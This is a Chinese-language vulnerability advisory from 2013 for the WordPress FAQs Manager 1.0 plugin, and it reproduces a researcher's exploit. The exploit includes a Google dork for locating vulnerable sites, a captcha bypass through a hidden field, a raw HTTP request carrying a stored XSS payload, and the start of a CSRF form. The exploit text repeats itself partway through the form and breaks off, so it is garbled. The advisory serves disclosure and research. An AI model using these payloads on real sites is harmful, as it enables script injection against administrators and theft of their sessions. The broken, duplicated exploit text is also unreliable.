发布日期:2013-03-22
更新日期:2013-03-26
受影响系统:
WordPress FAQs Manager 1.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58645
WordPress FAQs Manager是管理网站FAQ的插件。
FAQs Manager 1.0 及其他版本在IndiaNIC FAQ设置页面中存在跨站脚本和跨站请求伪造漏洞,攻击者可利用这些漏洞在question参数中插入alert(1)。Captcha值可以从captcha参数中读出。在受影响站点的用户浏览器中执行任意脚本代码,窃取cookie身份验证凭证,执行未授权操作,泄露和修改敏感信息。
<*来源:m3tamantra
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<!--
# Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin CSRF + XSS
# Google Dork: inurl:wp-content/plugins/faqs-manager
# Date: 21.03.2013
# Exploit Author: m3tamantra ()
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)
##############
# Description:
##############
# IndiaNIC FAQ Settings Page is vulnerable for CSRF.
# The Ask Question area (front-end) is vulnerable for XSS. It is possible to insert <script>alert(1)</script> in question parameter.
# The Captcha value can be read from captcha parameter (hidden field)
#
###################################
#### Part of Ask Question form ####
###################################
<form action="" method="POST">
<input type="hidden" value="1">
<input type="hidden" value="1">
<input type="hidden" value="inic_faq_questions">
<input type="hidden" value="5540"> <=================== We don't need the captcha Image when we have this xD
####################################################################
#### Request from Ask Question area (XSS in question parameter) ####
####################################################################
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:9001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: ?p=11
Content-Length: 143
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
group_id=1&from_user=1&action=inic_faq_questions&captcha=8560&who_asked=lalalallala%40gmail.com&question=XSS+TEST+<script>alert(1)</script>%3F&captcha_code=8560
# When admin navigate to Question-Area (back-end) arbitrary JavaScript will execute.
#######################################################################
-->
<title>
#####################################################
############## IndiaNIC FAQ 1.0 CSRF ################
#####################################################
</title>
<body>
<!-- replace "http://www.example.com/wordpress" -->
<form action="http://<html>
<!--
# Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin CSRF + XSS
# Google Dork: inurl:wp-content/plugins/faqs-manager
# Date: 21.03.2013
# Exploit Author: m3tamantra ()
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)
##############
# Description:
##############
# IndiaNIC FAQ Settings Page is vulnerable for CSRF.
# The Ask Question area (front-end) is vulnerable for XSS. It is possible to insert <script>alert(1)</script> in question parameter.
# The Captcha value can be read from captcha parameter (hidden field)
#
###################################
#### Part of Ask Question form ####
###################################
<form action="" method="POST">
<input type="hidden" value="1">
<input type="hidden" value="1">
<input type="hidden" value="inic_faq_questions">
<input type="hidden" value="5540"> <=================== We don't need the captcha Image when we have this xD